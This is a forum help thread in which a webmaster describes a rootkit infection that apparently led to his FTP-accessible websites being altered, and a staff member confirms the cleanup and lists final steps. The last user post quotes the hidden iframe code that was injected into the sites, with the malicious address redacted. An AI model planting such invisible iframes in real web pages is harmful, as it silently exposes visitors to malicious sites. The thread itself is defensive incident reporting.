Malware stole FTP login and hacked website

Discussion in 'Malware Help (A Specialist Will Reply)' started by Ivar, Sep 15, 2009.

  1. Ivar

    Ivar Private E-2

    Monday my AVG 8.5 (free edition) found some infected files.

    It found FakeAlert, SHeur2 and Rootkit-Agent.DI

    AVG removed the first two infections. But the Rootkit-Agent.DI got stuck into my ndis.sys which was a white listed file.

    I've been trying to remove this Rootkit-AGent.DI for the last 2 days without any results.

    I work as a webmaster and have FTP access to multiple domains. Now most these domains have been compromised. It randomly find webpages with the word "index" in it and adds a invisible iframe which refers to a malicious website. This is a major problem!

    Finally I found this site and did the READ & RUN ME FIRST. The combofix was the only scan that found something in my ndis.sys ans I believe it removed the file.

    I hope someone can tell me how I can make sure that the infections are gone?

    How can I find out of this Rootkit-Agent is indeed the cullprit of the hacked websites?
     

    Attached Files:

  2. Ivar

    Ivar Private E-2

    and the last log
     

    Attached Files:

  3. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Yes ComboFix remove the infected file and restored a clean copy.

    Not possible to determine this for certain, but since this was the only real infection then it is highly possible espcially since it directly affects network connections. See: http://www.prevx.com/blog/115/Neprodoor-flies-beyond-the-radar.html

    Note: If you knowingly installed WinPcap, You will need to reinstall it because ComboFix broke it. WinPcap can be used by malware and for illegal purposes which is why it is removed automatically.


    Your logs are clean now.

    If you are not having any other malware problems, it is time to do our final steps:
    1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no protection. They do not use any significant amount of resources ( except a little disk space ) until you run a scan.
    2. If we used Pocket Killbox during your cleanup, do the below
      • Run Pocket Killbox and select File, Cleanup, Delete All Backups
    3. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
      • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
      • "%userprofile%\Desktop\combofix" /u
        • Notes: The space between the combofix" and the /u, it must be there.
        • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.
    4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
    5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
    6. If running Vista, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
    7. Go to add/remove programs and uninstall HijackThis.
    8. Goto the C:\MGtools folder and find the MGclean.bat file. Double click on this file to run this cleanup program that will remove files and folders related to MGtools and some other items from our cleaning procedures.
    9. If you are running Vista, Windows XP or Windows ME, do the below:
      • Refer to the cleaning procedures in step 3 the READ ME for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
      • Then reboot and Enable System Restore to create a new clean Restore Point.
    10. After doing the above, you should work thru the below link:
     
  4. Ivar

    Ivar Private E-2

    Thank you very much. I haven't encountered any more problems, so it looks like my system is clean.

    I have a list of URL's which the virus inserted into my websites. If you are interested I can post it.

    The virus seems to have developed. There is still one website infected. I don't have access to this website so I can't change it. But the code inserted by the virus has changed.

    the code always looked like: <iframe width=993 height=170 src="[MALICIOUS_URL]/index.php" ></iframe>

    but now there has been a change. Different parameters in the iframe tag:
    <iframe hasuo='ehP3dFGV' bspub='IWHpTa4V' src='MALICIOUS_URL' upxrp='sJ5XtS6M' quosu='S02kmvCk' width='0' height='0' style='display:none'></iframe>

    I'm not sure if you can use this info, but I posted it just in case.
     
  5. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome.

    No thanks! ;)

    Thanks this may be helpful to others who run into a similar infection.
     

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds